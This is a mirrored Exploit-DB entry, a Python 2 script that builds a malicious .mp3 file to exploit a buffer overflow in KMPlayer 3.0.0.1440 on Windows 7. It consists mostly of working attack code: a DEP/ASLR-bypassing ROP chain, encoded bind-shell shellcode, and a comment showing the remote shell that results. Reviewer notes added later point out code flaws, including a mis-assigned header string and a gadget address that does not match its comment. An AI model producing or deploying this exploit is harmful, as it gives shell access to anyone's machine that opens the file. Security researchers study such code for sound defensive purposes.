The KMPlayer 3.0.0.1440 (Windows 7) – ‘.mp3’ Local Buffer Overflow (ASLR Bypass)

  • 作者: xsploitedsec
    日期: 2011-06-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17383/
  • #!/usr/bin/python
    # Exploit Title: The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit (Win7 + ASLR bypass)
    # Date: Jun 10th, 2011
    # Author(s): 
    # 	dookie and ronin (initial XPSP3 DEP bypass PoC)
    # 	xsploitedsec <xsploitedsecurity[at]gmail[dot]com> (Win7 + ASLR mod)
    # Software Link: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
    # Tested On: Windows7 x64 Ultimate SP1 Eng
    #
    # References:
    # http://www.exploit-db.com/exploits/17364/
    # https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
    # Video of this PoC in action: http://www.youtube.com/watch?v=jAHJveGiCfI
    #
    # Shouts/Thanks: edb-team, corelanc0d3r/corelan team, dookie2000ca, kAoTiX, deca, MaX
    # "When the going gets tough, the tough get going."
    # Have fun!
    
    """Proof-of-concept file generator (Python 2).

    The script writes exactly one file, ``km_pwn_aslr.mp3``, into the current
    working directory and has no other side effects. The output is the
    concatenation of six pieces, in the order given by ``sploit`` below:
    ``head``, ``junk`` (a run of 0x41 bytes), ``rop``, ``nops`` (a run of 0x90
    bytes), ``shellcode`` and a run of 0x44 bytes that pads the whole file to
    7000 bytes.

    Python 2 semantics are assumed throughout: the hex-escape string literals
    are byte strings and ``open(..., "w")`` writes them unchanged. Under
    Python 3 the same literals are text and would be UTF-8 encoded on write,
    so the file produced would not match this data byte for byte.
    """
    
    import os  # NOTE(review): not referenced anywhere in this script
    
    # Output path; relative, so the file is created in the current working directory.
    evilfile = "km_pwn_aslr.mp3"
    
    # Leading bytes of the generated file.
    # NOTE(review): as written here (no enclosing parentheses and no line
    # continuation) only the literal on the next line is assigned to ``head``
    # (17 bytes); the bare string literals that follow it are separate
    # expression statements with no effect, and ``len(head)`` in the padding
    # arithmetic below reflects that.
    head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13"
    "\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70"
    "\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65"
    "\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3"
    "\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34"
    "\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E"
    "\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65"
    "\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45"
    "\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54"
    "\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C"
    "\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61"
    "\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27"
    "\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0"
    "\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0"
    "\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F"
    "\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00"
    "\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44"
    "\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52"
    "\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C"
    "\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D"
    "\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D"
    "\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC"
    "\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42"
    "\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00"
    "\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49"
    "\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B"
    "\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00"
    "\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F"
    "\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C"
    "\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F"
    "\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00"
    "\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00"
    "\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D"
    "\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75"
    "\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC"
    "\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49"
    "\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20"
    "\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00"
    "\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93"
    "\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00"
    "\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00"
    "\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00"
    "\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00"
    "\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00"
    "\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00"
    "\x00\x00"
    
    #xs@ArchBook ~ $ msfpayload windows/shell_bind_tcp LPORT=4444 R|msfencode -b '\x00\x0a\x0d' -t c
    #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
    #
    #xs@ArchBook ~ $ ncat 10.0.1.7 4444
    #Microsoft Windows [Version 6.1.7601]
    #Copyright (c) 2009 Microsoft Corporation.All rights reserved.
    #
    #C:\Program Files (x86)\The KMPlayer>
    
    # Opaque encoded payload bytes. The transcript above reports 368 bytes; the
    # literal below is 24 lines of 15 bytes plus a final line of 8, i.e. 368.
    shellcode = (
    "\xb8\x72\x95\x89\x50\xdd\xc1\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
    "\x56\x31\x43\x13\x83\xc3\x04\x03\x43\x7d\x77\x7c\xac\x69\xfe"
    "\x7f\x4d\x69\x61\x09\xa8\x58\xb3\x6d\xb8\xc8\x03\xe5\xec\xe0"
    "\xe8\xab\x04\x73\x9c\x63\x2a\x34\x2b\x52\x05\xc5\x9d\x5a\xc9"
    "\x05\xbf\x26\x10\x59\x1f\x16\xdb\xac\x5e\x5f\x06\x5e\x32\x08"
    "\x4c\xcc\xa3\x3d\x10\xcc\xc2\x91\x1e\x6c\xbd\x94\xe1\x18\x77"
    "\x96\x31\xb0\x0c\xd0\xa9\xbb\x4b\xc1\xc8\x68\x88\x3d\x82\x05"
    "\x7b\xb5\x15\xcf\xb5\x36\x24\x2f\x19\x09\x88\xa2\x63\x4d\x2f"
    "\x5c\x16\xa5\x53\xe1\x21\x7e\x29\x3d\xa7\x63\x89\xb6\x1f\x40"
    "\x2b\x1b\xf9\x03\x27\xd0\x8d\x4c\x24\xe7\x42\xe7\x50\x6c\x65"
    "\x28\xd1\x36\x42\xec\xb9\xed\xeb\xb5\x67\x40\x13\xa5\xc0\x3d"
    "\xb1\xad\xe3\x2a\xc3\xef\x6b\x9f\xfe\x0f\x6c\xb7\x89\x7c\x5e"
    "\x18\x22\xeb\xd2\xd1\xec\xec\x15\xc8\x49\x62\xe8\xf2\xa9\xaa"
    "\x2f\xa6\xf9\xc4\x86\xc6\x91\x14\x26\x13\x35\x45\x88\xcb\xf6"
    "\x35\x68\xbb\x9e\x5f\x67\xe4\xbf\x5f\xad\x93\x87\x91\x95\xf0"
    "\x6f\xd0\x29\xe7\x33\x5d\xcf\x6d\xdc\x0b\x47\x19\x1e\x68\x50"
    "\xbe\x61\x5a\xcc\x17\xf6\xd2\x1a\xaf\xf9\xe2\x08\x9c\x56\x4a"
    "\xdb\x56\xb5\x4f\xfa\x69\x90\xe7\x75\x52\x73\x7d\xe8\x11\xe5"
    "\x82\x21\xc1\x86\x11\xae\x11\xc0\x09\x79\x46\x85\xfc\x70\x02"
    "\x3b\xa6\x2a\x30\xc6\x3e\x14\xf0\x1d\x83\x9b\xf9\xd0\xbf\xbf"
    "\xe9\x2c\x3f\x84\x5d\xe1\x16\x52\x0b\x47\xc1\x14\xe5\x11\xbe"
    "\xfe\x61\xe7\x8c\xc0\xf7\xe8\xd8\xb6\x17\x58\xb5\x8e\x28\x55"
    "\x51\x07\x51\x8b\xc1\xe8\x88\x0f\xf1\xa2\x90\x26\x9a\x6a\x41"
    "\x7b\xc7\x8c\xbc\xb8\xfe\x0e\x34\x41\x05\x0e\x3d\x44\x41\x88"
    "\xae\x34\xda\x7d\xd0\xeb\xdb\x57"
    )
    
    # A few notes:
    # All DEP/ASLR bypass ROP code is from PProcDLL.dll (and assumes no ASLR on this module).
    # 1.
    # 	Calls to VirtualProtect (from pprocdll.dll) are found at:
    # 	0x1014717B : CALL DWORD PTR DS:[<&KERNEL32.VirtualProtect>]
    # 	0x101471F4 : CALL DWORD PTR DS:[<&KERNEL32.VirtualProtect>]
    # 2.
    #	A kernel32 pointer is already sitting in ECX after the crash (on my test PC).
    #
    #	For the sake of challenge and learning. I use ROP/static offsets to dynamically retrieve a kernel32 pointer
    #	from the stack/get it into a register. I then increase this value until it points at &Kernel32.VirtualProtect().
    #	The rest is just basic ROP/DEP (using the VirtualProtect() method).
    
    # Number of 0x41 bytes placed between ``head`` and the ROP chain.
    eip_offset = 4095
    #kernel32 ptr offset = initial ESP-288
    #virtualprotect ptr offset = kernel32 ptr + 1075
    
    junk = "\x41" * eip_offset
    
    # Four-byte filler dword; repeated between gadgets as stack padding.
    rop_align = "\x41\x41\x41\x41"
    
    ################################# Begin ROP chain #################################
    # Every gadget below is a 4-byte little-endian address; the trailing comment on
    # each line gives the address in readable form and the author's gadget text.
    
    ########## Redirect execution back to stack ##########
    rop = "\x17\xBF\x0E\x10"						#0x100EBF17 :# ADD ESP,20 # RETN 4
    rop += rop_align * 9
    ########## Place stack pointer in EAX ##########
    rop += "\x7F\xCB\x0F\x10"						#0x100FCB7F :# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN
    rop += rop_align	* 15
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    ########## Jump over VirtualProtect() params ##########
    rop += "\x56\x75\x13\x10"						#0x10137556 :# ADD ESP,20 # RETN
    ########## VirtualProtect call placeholder ##########
    rop += "\x42\x45\x45\x46"						#&Kernel32.VirtualProtect() placeholder - "BEEF"
    rop += "WWWW" 								#Return address param placeholder
    rop += "XXXX"							#lpAddress param placeholder
    rop += "YYYY"							#Size param placeholder
    rop += "ZZZZ"							#flNewProtect param placeholder
    rop += "\x60\xFC\x18\x10" 						#lpflOldProtect param placeholder (Writeable Address) - 0x1018FC60 {PAGE_WRITECOPY}
    rop += rop_align	* 2
    ########## Grab kernel32 pointer from the stack, place it in EAX ##########
    rop += "\x5D\x1C\x12\x10" * 6 					#0x10121C5D :# SUB EAX,30 # RETN
    rop += "\xF6\xBC\x11\x10" 						#0x1011BCF6 :# MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN 
    rop += rop_align
    ########## EAX = kernel pointer, now retrieve pointer to VirtualProtect() ##########
    rop += ("\x76\xE5\x12\x10" + rop_align) * 4		#0x1012E576 :# ADD EAX,100 # POP EBP # RETN
    rop += "\x40\xD6\x12\x10"						#0x1012D640 :# ADD EAX,20 # RETN
    rop += "\xB1\xB6\x11\x10"						#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD0\x64\x03\x10"						#0x100364D0 :# ADD EAX,8 # RETN
    rop += "\x33\x29\x0E\x10"						#0x100E2933 :# DEC EAX # RETN
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    ########## At this point, ECX = &kernel32.VirtualProtect, EDI/EAX = initial stack pointer ########## 
    
    ########## Make EAX point to address of VirtualProtect() placeholder ##########
    rop += "\xB1\xB6\x11\x10" * 5					#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD0\x64\x03\x10" * 2					#0x100364D0 :# ADD EAX,8 # RETN
    rop += "\xD5\xCE\x11\x10" * 4					#0x1011CED5 :# INC EAX # RETN
    ########## Write VirtualProtect pointer to stack ##########
    rop += "\x41\x2F\x11\x10"						#0x10112F41 :# MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
    rop += rop_align
    ########## Make ECX point to address of nops / shellcode ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align * 2
    rop += ("\x76\xE5\x12\x10" + rop_align) * 3		#0x1012E576 :# ADD EAX,100 # POP EBP # RETN
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    ########## Make EAX point to return address placeholder ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    rop += "\xB1\xB6\x11\x10" * 6					#0x1011B6B1 :# ADD EAX,0C # RETN
    ########## Write return address to stack ##########
    rop += "\x41\x2F\x11\x10"						#0x10112F41 :# MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
    rop += rop_align
    ########## Make EAX point to lpAddress placeholder ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    rop += "\xB1\xB6\x11\x10" * 7					#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD5\xCE\x11\x10" * 4					#0x1011CED5 :# INC EAX # RETN
    ########## Write lpAddress to stack ##########
    rop += "\x41\x2F\x11\x10"						#0x10112F41 :# MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
    rop += rop_align
    ########## Save address of VirtualProtect call placeholder to EBX (for later) ##########
    rop += "\x77\x78\x12\x10"						#0x10127877 :# SUB EAX,7 # POP ESI # RETN
    rop += rop_align * 2
    rop += "\x33\x29\x0E\x10"						#0x100E2933 :# DEC EAX # RETN
    rop += "\x81\x96\x03\x10"						#0x10039681 :# XCHG EAX,EBX # ADD AL,10 # RETN 	[Module : PProcDLL.dll]** 
    ########## Make EAX point to Size param placeholder ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    rop += "\xB1\xB6\x11\x10" * 6					#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD0\x64\x03\x10"						#0x100364D0 :# ADD EAX,8 # RETN
    ########## Craft Size parameter into EAX (Adjust to needed/desired size) ##########
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    rop += "\x2C\x2A\x0D\x10"						#0x100D2A2C :# XOR EAX,EAX # RETN
    rop += ("\x76\xE5\x12\x10" + rop_align) * 10	#0x1012E576 :# ADD EAX,100 # POP EBP # RETN
    ########## Write Size param to stack ##########
    rop += "\x60\x83\x02\x10"						#0x10028360 :# MOV DWORD PTR DS:[ECX],EAX # RETN
    ########## Make EAX point to address of flNewProtect placeholder ##########
    rop += "\xD2\x9F\x10\x10"						#0x10109FD2 :# MOV EAX,ECX # RETN
    rop += "\xD0\x64\x03\x10"						#0x100364D0 :# ADD EAX,8 # RETN
    rop += "\x33\x29\x0E\x10" * 4					#0x100E2933 :# DEC EAX # RETN
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    ########## Put flNewProtect param (0x00000040) in EAX ##########
    rop += "\x2C\x2A\x0D\x10"						#0x100D2A2C :# XOR EAX,EAX # RETN
    rop += "\x68\xE5\x12\x10"						#0x1012E568 :# ADD EAX,40 # POP EBP # RETN
    rop += rop_align
    ########## Write flNewProtect param to stack ##########
    rop += "\x60\x83\x02\x10"						#0x10028360 :# MOV DWORD PTR DS:[ECX],EAX # RETN
    
    ########## Everything is ready to go, Get EBX back into ESP and RETN ##########
    # NOTE(review): the bytes on the next line decode to 0x1010A3D8, but the
    # original comment gave 0x10039681, which is the address of the
    # "XCHG EAX,EBX # ADD AL,10 # RETN" gadget used earlier in this chain.
    # Whether 0x1010A3D8 holds the same sequence cannot be verified from this file.
    rop += "\xD8\xA3\x10\x10"						#0x1010A3D8 (per the bytes; comment originally read 0x10039681) :# XCHG EAX,EBX # ADD AL,10 # RETN
    rop += rop_align
    rop += "\x99\x09\x11\x10"						#0x10110999 :# XCHG EAX,ESP # RETN
    ################################# End ROP chain #################################
    
    # 300-byte 0x90 run placed directly before the payload.
    nops = "\x90" * 300
    # Fill to a fixed 7000-byte file. String repetition by a negative count
    # yields "" in Python, so if the pieces ever exceeded 7000 bytes the file
    # would silently be longer than 7000 rather than failing.
    padding = "D" * (7000 - len(head + junk + rop + nops + shellcode))
    
    # Final layout: head | junk | rop | nops | shellcode | padding
    sploit = (head + junk + rop + nops + shellcode + padding)
    
    # Written in text mode ("w"), not "wb": on Windows this translates any 0x0a
    # byte to 0x0d 0x0a (none reaches the file here -- the encoder note above
    # excludes 0x0a and the hand-written pieces contain none), and under
    # Python 3 the str would be text-encoded. The handle is closed explicitly;
    # no context manager is used.
    crashy = open(evilfile,"w")
    crashy.write(sploit)
    crashy.close()